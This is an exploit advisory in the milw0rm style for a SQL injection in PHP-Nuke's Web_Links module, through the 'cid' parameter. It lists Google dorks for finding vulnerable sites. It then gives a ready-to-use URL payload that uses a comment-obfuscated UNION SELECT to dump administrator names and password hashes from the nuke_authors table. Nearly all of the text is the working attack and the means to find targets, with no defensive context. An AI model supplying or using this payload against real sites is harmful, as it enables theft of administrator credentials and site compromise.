PHP-Nuke Module Web_Links SQL Injection(cid)

###############################################################

#

#   PHP-Nuke Module Web_Links SQL Injection(cid)

#

###############################################################

#

# AUTHOR : S@BUN

#

# HOME 1 : http://www.milw0rm.com/author/1334

#

# MA?L : hackturkiye.hackturkiye (at) gmail (dot) com [email concealed]

#

################################################################

#

#  DORK 1 : allinurl:  file-index modules-php-op-modload-name-Web_Links "l_op viewlink"

#

DORK 2 : allinurl:  cid file-index modules-php-op-modload"l_op viewlink"name-Web_Links

################################################################

example :

http://XXX/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlin
k&cid= (exploit)

EXPLO?T

modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=-0000
0%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(aid,0x3a,pwd),char(111,11
2,101,114,110,97,108,101,51)/**/from%2F%2A%2A%2Fnuke_authors/*where%20ad
min%201=%202

################################################################

# S@BUN           i AM NOT HACKER      S@BUN

################################################################